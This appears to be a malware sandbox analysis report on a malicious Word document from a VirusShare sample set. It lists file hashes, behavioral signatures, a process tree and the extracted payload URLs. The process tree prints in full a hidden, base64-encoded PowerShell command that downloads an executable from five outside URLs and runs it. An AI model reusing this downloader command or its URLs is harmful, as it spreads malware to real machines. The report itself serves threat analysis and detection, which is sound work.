Overview
overview
10Static
static
10PKSJ Malwa...87.exe
windows7-x64
1PKSJ Malwa...87.exe
windows10-2004-x64
3PKSJ Malwa...4d.exe
windows7-x64
8PKSJ Malwa...4d.exe
windows10-2004-x64
8PKSJ Malwa...c9.xls
windows7-x64
10PKSJ Malwa...c9.xls
windows10-2004-x64
10PKSJ Malwa...f9.doc
windows7-x64
10PKSJ Malwa...f9.doc
windows10-2004-x64
10PKSJ Malwa...30.pdf
windows7-x64
1PKSJ Malwa...30.pdf
windows10-2004-x64
1PKSJ Malwa...8d.exe
windows7-x64
1PKSJ Malwa...8d.exe
windows10-2004-x64
1PKSJ Malwa...fa.exe
windows7-x64
1PKSJ Malwa...fa.exe
windows10-2004-x64
3PKSJ Malwa...c8.doc
windows7-x64
10PKSJ Malwa...c8.doc
windows10-2004-x64
10PKSJ Malwa...03.doc
windows7-x64
1PKSJ Malwa...03.doc
windows10-2004-x64
1PKSJ Malwa...40.pdf
windows7-x64
1PKSJ Malwa...40.pdf
windows10-2004-x64
1PKSJ Malwa...4e.doc
windows7-x64
1PKSJ Malwa...4e.doc
windows10-2004-x64
1PKSJ Malwa...cd.pdf
windows7-x64
1PKSJ Malwa...cd.pdf
windows10-2004-x64
1PKSJ Malwa...7b.exe
windows7-x64
10PKSJ Malwa...7b.exe
windows10-2004-x64
10PKSJ Malwa...82.exe
windows7-x64
1PKSJ Malwa...82.exe
windows10-2004-x64
3PKSJ Malwa...6f.doc
windows7-x64
10PKSJ Malwa...6f.doc
windows10-2004-x64
10PKSJ Malwa...d2.doc
windows7-x64
1PKSJ Malwa...d2.doc
windows10-2004-x64
1Analysis
-
max time kernel
100s -
max time network
147s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
07-10-2022 06:08
Behavioral task
behavioral1
Sample
PKSJ Malware/1/VirusShare_0a2d1ecedf3f79754aa2c18d62e75287.exe
Resource
win7-20220901-en
Behavioral task
behavioral2
Sample
PKSJ Malware/1/VirusShare_0a2d1ecedf3f79754aa2c18d62e75287.exe
Resource
win10v2004-20220812-en
Behavioral task
behavioral3
Sample
PKSJ Malware/1/VirusShare_0aee78510c46e3a200b6bc21ac1c954d.exe
Resource
win7-20220812-en
Behavioral task
behavioral4
Sample
PKSJ Malware/1/VirusShare_0aee78510c46e3a200b6bc21ac1c954d.exe
Resource
win10v2004-20220812-en
Behavioral task
behavioral5
Sample
PKSJ Malware/1/VirusShare_0fea640a7da27f365b3675f73626b9c9.xls
Resource
win7-20220812-en
Behavioral task
behavioral6
Sample
PKSJ Malware/1/VirusShare_0fea640a7da27f365b3675f73626b9c9.xls
Resource
win10v2004-20220901-en
Behavioral task
behavioral7
Sample
PKSJ Malware/1/VirusShare_1ba8249d8503c0cf7bc125588c43bef9.doc
Resource
win7-20220812-en
Behavioral task
behavioral8
Sample
PKSJ Malware/1/VirusShare_1ba8249d8503c0cf7bc125588c43bef9.doc
Resource
win10v2004-20220812-en
Behavioral task
behavioral9
Sample
PKSJ Malware/1/VirusShare_3cd9a967b67fe69351e390195ca7a430.pdf
Resource
win7-20220812-en
Behavioral task
behavioral10
Sample
PKSJ Malware/1/VirusShare_3cd9a967b67fe69351e390195ca7a430.pdf
Resource
win10v2004-20220901-en
Behavioral task
behavioral11
Sample
PKSJ Malware/2/VirusShare_01b55404de50bd1a56343b2f316ff88d.exe
Resource
win7-20220812-en
Behavioral task
behavioral12
Sample
PKSJ Malware/2/VirusShare_01b55404de50bd1a56343b2f316ff88d.exe
Resource
win10v2004-20220812-en
Behavioral task
behavioral13
Sample
PKSJ Malware/2/VirusShare_1ad9a67240d5775395c45b64dd6529fa.exe
Resource
win7-20220812-en
Behavioral task
behavioral14
Sample
PKSJ Malware/2/VirusShare_1ad9a67240d5775395c45b64dd6529fa.exe
Resource
win10v2004-20220901-en
Behavioral task
behavioral15
Sample
PKSJ Malware/2/VirusShare_2fe5b00079aec2d8369a798230313ec8.doc
Resource
win7-20220812-en
Behavioral task
behavioral16
Sample
PKSJ Malware/2/VirusShare_2fe5b00079aec2d8369a798230313ec8.doc
Resource
win10v2004-20220812-en
Behavioral task
behavioral17
Sample
PKSJ Malware/2/VirusShare_3f0b1eed4b7b9ae05fab4d949843f103.doc
Resource
win7-20220901-en
Behavioral task
behavioral18
Sample
PKSJ Malware/2/VirusShare_3f0b1eed4b7b9ae05fab4d949843f103.doc
Resource
win10v2004-20220812-en
Behavioral task
behavioral19
Sample
PKSJ Malware/2/VirusShare_480ef02bb062a57724e1b3e14532a140.pdf
Resource
win7-20220812-en
Behavioral task
behavioral20
Sample
PKSJ Malware/2/VirusShare_480ef02bb062a57724e1b3e14532a140.pdf
Resource
win10v2004-20220901-en
Behavioral task
behavioral21
Sample
PKSJ Malware/3/VirusShare_3fb34964fa7b8c6bfad8d960380ff04e.doc
Resource
win7-20220812-en
Behavioral task
behavioral22
Sample
PKSJ Malware/3/VirusShare_3fb34964fa7b8c6bfad8d960380ff04e.doc
Resource
win10v2004-20220812-en
Behavioral task
behavioral23
Sample
PKSJ Malware/3/VirusShare_4675e87be15585e66b0c88b833dd9ecd.pdf
Resource
win7-20220812-en
Behavioral task
behavioral24
Sample
PKSJ Malware/3/VirusShare_4675e87be15585e66b0c88b833dd9ecd.pdf
Resource
win10v2004-20220812-en
Behavioral task
behavioral25
Sample
PKSJ Malware/3/VirusShare_4aa5734fe9c86184f931f4ddaf2d4d7b.exe
Resource
win7-20220901-en
Behavioral task
behavioral26
Sample
PKSJ Malware/3/VirusShare_4aa5734fe9c86184f931f4ddaf2d4d7b.exe
Resource
win10v2004-20220812-en
Behavioral task
behavioral27
Sample
PKSJ Malware/3/VirusShare_5c8b670c503455baafbff400a446cf82.exe
Resource
win7-20220812-en
Behavioral task
behavioral28
Sample
PKSJ Malware/3/VirusShare_5c8b670c503455baafbff400a446cf82.exe
Resource
win10v2004-20220812-en
Behavioral task
behavioral29
Sample
PKSJ Malware/3/VirusShare_6ad036ba93c94d6976e2d93c7a3aec6f.doc
Resource
win7-20220901-en
Behavioral task
behavioral30
Sample
PKSJ Malware/3/VirusShare_6ad036ba93c94d6976e2d93c7a3aec6f.doc
Resource
win10v2004-20220812-en
Behavioral task
behavioral31
Sample
PKSJ Malware/4/VirusShare_4b8eb7fe75f72c1c5c1f80af9cd165d2.doc
Resource
win7-20220812-en
Behavioral task
behavioral32
Sample
PKSJ Malware/4/VirusShare_4b8eb7fe75f72c1c5c1f80af9cd165d2.doc
Resource
win10v2004-20220812-en
General
-
Target
PKSJ Malware/2/VirusShare_2fe5b00079aec2d8369a798230313ec8.doc
-
Size
125KB
-
MD5
2fe5b00079aec2d8369a798230313ec8
-
SHA1
e233595a2ee62f6197fcc7d9088fce3505c38ec0
-
SHA256
8eb6805a0852b220695175ce81a5b139f1438dc06ea3fc1347b047702880374c
-
SHA512
d9b4173274b49d7f041aea1a6866d5cc79530360668299385a10f25597b608308a5cb6502363709a7e09e43d30a1df95e1ab72fcc71852c78b51da016c2bbed7
-
SSDEEP
3072:beKgdzSrG8KyIwLx3phgC1s0rPOWfKNR/:beKUzSLnLx3X3O0r2WfKNJ
Malware Config
Extracted
https://sandiegohomevalues.com/engl/4de-kzsyhu-768611/
https://www.wenkawang.com/data/bofze0s-7ji4-15/
https://www.bruidsfotograaf-utrecht.com/wp-includes/QLvFLy/
http://ma.jopedu.com/img/8z8dl-3xn-655019278/
http://pay.jopedu.com/ThinkPHP/l9okcguh6-b9nnrh7-96245524/
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
Powershell.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1552 4732 Powershell.exe -
Blocklisted process makes network request 2 IoCs
Processes:
Powershell.exeflow pid process 23 1552 Powershell.exe 26 1552 Powershell.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEdescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
WINWORD.EXEpid process 4976 WINWORD.EXE 4976 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
Powershell.exepid process 1552 Powershell.exe 1552 Powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
Powershell.exedescription pid process Token: SeDebugPrivilege 1552 Powershell.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
WINWORD.EXEpid process 4976 WINWORD.EXE 4976 WINWORD.EXE -
Suspicious use of SetWindowsHookEx 8 IoCs
Processes:
WINWORD.EXEpid process 4976 WINWORD.EXE 4976 WINWORD.EXE 4976 WINWORD.EXE 4976 WINWORD.EXE 4976 WINWORD.EXE 4976 WINWORD.EXE 4976 WINWORD.EXE 4976 WINWORD.EXE -
Suspicious use of WriteProcessMemory 2 IoCs
Processes:
WINWORD.EXEdescription pid process target process PID 4976 wrote to memory of 3488 4976 WINWORD.EXE splwow64.exe PID 4976 wrote to memory of 3488 4976 WINWORD.EXE splwow64.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\PKSJ Malware\2\VirusShare_2fe5b00079aec2d8369a798230313ec8.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exePowershell -w hidden -en JABKAGIAagBkAG0AcgBrAGYAPQAnAFcAdgB4AG8AagBqAHgAeQAnADsAJABLAHEAegB2AHEAagBjAGQAYgBkAGsAIAA9ACAAJwAzADAANgAnADsAJABHAHgAZAB1AG8AYwBkAGoAYwBqAHQAPQAnAEIAawBmAGsAYgBvAGYAaQBwAHAAYwB6AHQAJwA7ACQATQBiAGsAbQBvAG8AbgBnAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABLAHEAegB2AHEAagBjAGQAYgBkAGsAKwAnAC4AZQB4AGUAJwA7ACQAVQBlAGYAYwB6AHAAYwBkAGYAaQB4AG8APQAnAFIAcQBkAGsAegBtAHkAZABtAHcAdAB3AGYAJwA7ACQASQB5AGIAbgBwAHkAdABmAGEAcABtAD0AJgAoACcAbgBlAHcAJwArACcALQBvAGIAJwArACcAagBlAGMAJwArACcAdAAnACkAIABuAGUAVAAuAHcAZQBiAGMATABJAEUAbgB0ADsAJABEAHEAcwB5AG4AYQBoAHkAeQB2AHgAbAA9ACcAaAB0AHQAcABzADoALwAvAHMAYQBuAGQAaQBlAGcAbwBoAG8AbQBlAHYAYQBsAHUAZQBzAC4AYwBvAG0ALwBlAG4AZwBsAC8ANABkAGUALQBrAHoAcwB5AGgAdQAtADcANgA4ADYAMQAxAC8AKgBoAHQAdABwAHMAOgAvAC8AdwB3AHcALgB3AGUAbgBrAGEAdwBhAG4AZwAuAGMAbwBtAC8AZABhAHQAYQAvAGIAbwBmAHoAZQAwAHMALQA3AGoAaQA0AC0AMQA1AC8AKgBoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBiAHIAdQBpAGQAcwBmAG8AdABvAGcAcgBhAGEAZgAtAHUAdAByAGUAYwBoAHQALgBjAG8AbQAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAFEATAB2AEYATAB5AC8AKgBoAHQAdABwADoALwAvAG0AYQAuAGoAbwBwAGUAZAB1AC4AYwBvAG0ALwBpAG0AZwAvADgAegA4AGQAbAAtADMAeABuAC0ANgA1ADUAMAAxADkAMgA3ADgALwAqAGgAdAB0AHAAOgAvAC8AcABhAHkALgBqAG8AcABlAGQAdQAuAGMAbwBtAC8AVABoAGkAbgBrAFAASABQAC8AbAA5AG8AawBjAGcAdQBoADYALQBiADkAbgBuAHIAaAA3AC0AOQA2ADIANAA1ADUAMgA0AC8AJwAuACIAUwBgAFAATABJAFQAIgAoACcAKgAnACkAOwAkAEEAdgB2AGgAawBvAHkAZQByAD0AJwBaAGcAegBiAGQAegB5AG0AeQAnADsAZgBvAHIAZQBhAGMAaAAoACQAUgBjAHIAbgBkAHEAZgBtAGYAbQBlACAAaQBuACAAJABEAHEAcwB5AG4AYQBoAHkAeQB2AHgAbAApAHsAdAByAHkAewAkAEkAeQBiAG4AcAB5AHQAZgBhAHAAbQAuACIAZABPAGAAVwBuAGwAbwBhAEQAZgBgAEkAbABlACIAKAAkAFIAYwByAG4AZABxAGYAbQBmAG0AZQAsACAAJABNAGIAawBtAG8AbwBuAGcAKQA7ACQAUAB0AGkAdQBxAHIAaQBqAGQAawBsAHYAZQA9ACcASAB3AGgAcwBtAGwAegBzACcAOwBJAGYAIAAoACgAJgAoACcARwAnACsAJwBlAHQALQBJAHQAZQBtACcAKQAgACQATQBiAGsAbQBvAG8AbgBnACkALgAiAEwAZQBuAGAAZwBUAGgAIgAgAC0AZwBlACAAMwAwADMAMAA5ACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAHMAYABUAGEAcgBUACIAKAAkAE0AYgBrAG0AbwBvAG4AZwApADsAJABMAHMAdAB4AHMAcwBpAGEAPQAnAFkAcAB5AGgAdgBoAGgAdwAnADsAYgByAGUAYQBrADsAJABWAG4AYQBzAGIAZgBmAG0AbwBxAD0AJwBDAG0AZwBxAHAAZwBzAHMAbgBkAGkAYgAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABJAGwAcgBlAHIAdgB6AGgAaQA9ACcAQgB2AG4AbQB2AG0AcABhAGQAbgBsAGIAJwA=1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/1552-143-0x00007FFFC1770000-0x00007FFFC2231000-memory.dmpFilesize
10.8MB
-
memory/1552-142-0x00007FFFC1770000-0x00007FFFC2231000-memory.dmpFilesize
10.8MB
-
memory/1552-141-0x000002037F990000-0x000002037F9B2000-memory.dmpFilesize
136KB
-
memory/3488-139-0x0000000000000000-mapping.dmp
-
memory/4976-140-0x000001D3B0980000-0x000001D3B0984000-memory.dmpFilesize
16KB
-
memory/4976-137-0x00007FFFAB600000-0x00007FFFAB610000-memory.dmpFilesize
64KB
-
memory/4976-138-0x00007FFFAB600000-0x00007FFFAB610000-memory.dmpFilesize
64KB
-
memory/4976-136-0x00007FFFADAD0000-0x00007FFFADAE0000-memory.dmpFilesize
64KB
-
memory/4976-132-0x00007FFFADAD0000-0x00007FFFADAE0000-memory.dmpFilesize
64KB
-
memory/4976-135-0x00007FFFADAD0000-0x00007FFFADAE0000-memory.dmpFilesize
64KB
-
memory/4976-133-0x00007FFFADAD0000-0x00007FFFADAE0000-memory.dmpFilesize
64KB
-
memory/4976-134-0x00007FFFADAD0000-0x00007FFFADAE0000-memory.dmpFilesize
64KB
-
memory/4976-145-0x00007FFFADAD0000-0x00007FFFADAE0000-memory.dmpFilesize
64KB
-
memory/4976-148-0x00007FFFADAD0000-0x00007FFFADAE0000-memory.dmpFilesize
64KB
-
memory/4976-147-0x00007FFFADAD0000-0x00007FFFADAE0000-memory.dmpFilesize
64KB
-
memory/4976-146-0x00007FFFADAD0000-0x00007FFFADAE0000-memory.dmpFilesize
64KB